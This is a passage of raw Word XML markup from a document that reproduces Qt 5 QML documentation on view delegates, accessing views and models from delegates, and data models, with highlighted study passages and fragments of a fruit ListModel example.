        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png"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"http://doc.qt.io/qt-5/images/listview-section.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1078" type="#_x0000_t75" alt="" style="width:115.2pt;height:222.9pt">
            <v:imagedata r:id="rId2564" r:href="rId2565"/>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Pr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2277" w:name="qml-view-delegate"/>
      <w:bookmarkStart w:id="2278" w:name="view-delegates"/>
      <w:bookmarkStart w:id="2279" w:name="_Toc483001022"/>
      <w:bookmarkStart w:id="2280" w:name="_Toc483004013"/>
      <w:bookmarkStart w:id="2281" w:name="_Toc483604363"/>
      <w:bookmarkStart w:id="2282" w:name="_Toc483605583"/>
      <w:bookmarkEnd w:id="2277"/>
      <w:bookmarkEnd w:id="2278"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>View Delegates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2279"/>
      <w:bookmarkEnd w:id="2280"/>
      <w:bookmarkEnd w:id="2281"/>
      <w:bookmarkEnd w:id="2282"/>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Views need a</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to visually represent an item</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a list. A view will visualize each item list according to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>template defined by the delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Items in a model are accessible through the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property as well as the item's properties.</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Component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petdelegate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label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font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pixelSize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24</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if</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index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0</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label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text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type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 (default)"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else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type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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/listview-setup.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png"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"http://doc.qt.io/qt-5/images/listview-setup.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1079" type="#_x0000_t75" alt="" style="width:129.6pt;height:129.6pt">
            <v:imagedata r:id="rId2566" r:href="rId2567"/>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Pr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2283" w:name="accessing-views-and-models-from-delegate"/>
      <w:bookmarkStart w:id="2284" w:name="_Toc483001023"/>
      <w:bookmarkStart w:id="2285" w:name="_Toc483004014"/>
      <w:bookmarkStart w:id="2286" w:name="_Toc483604364"/>
      <w:bookmarkStart w:id="2287" w:name="_Toc483605584"/>
      <w:bookmarkEnd w:id="2283"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessing Views and Models from Delegates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2284"/>
      <w:bookmarkEnd w:id="2285"/>
      <w:bookmarkEnd w:id="2286"/>
      <w:bookmarkEnd w:id="2287"/>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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>list view</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to which the delegate is bound is </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessible from the delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView.view</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property. Likewise, the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2568" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GridView.view</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is available to delegates. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>corresponding model and its properties, therefore, are available through</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView.view.model</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any defined signals or methods in the model are also accessible</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This mechanism is </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful when you want to use the same delegate for a number of views</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, for example, </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>but you want decorations or other features to be different for each view</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you would like these different settings to be properties of each of the views</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Similarly, it might be of interest to access or show some properties of the model.</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 xml:space="preserve">In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the delegate shows the property</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the model, and the color of one of the fields depends on the property</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fruit_color</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the view.</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Rectangle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200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height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200</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ListModel</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fruitModel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property</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> language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"en"</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"Apple"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cost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2.45</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"Orange"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cost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3.25</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"Banana"</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cost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1.95</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Component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fruitDelegate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Row</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fruit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 Fruit: "</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8D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</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fruit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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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view</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fruit_color</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 Cost: $"</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cost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 Language: "</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fruit</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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view</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model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language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ListView</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property</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> color fruit_color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"green"</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model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fruitModel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delegate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fruitDelegate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fill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3903DE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2288" w:name="qml-data-models"/>
      <w:bookmarkStart w:id="2289" w:name="models"/>
      <w:bookmarkStart w:id="2290" w:name="_Toc483001024"/>
      <w:bookmarkStart w:id="2291" w:name="_Toc483004015"/>
      <w:bookmarkStart w:id="2292" w:name="_Toc483604365"/>
      <w:bookmarkStart w:id="2293" w:name="_Toc483605585"/>
      <w:bookmarkEnd w:id="2288"/>
      <w:bookmarkEnd w:id="2289"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2290"/>
      <w:bookmarkEnd w:id="2291"/>
      <w:bookmarkEnd w:id="2292"/>
      <w:bookmarkEnd w:id="2293"/>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 xml:space="preserve">Data is provided to the delegate via </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>named data roles</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which the </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate may bind to</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Here is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2569" w:anchor="listmodel" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with two roles,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2570" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a delegate that binds to these roles to display their values:</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
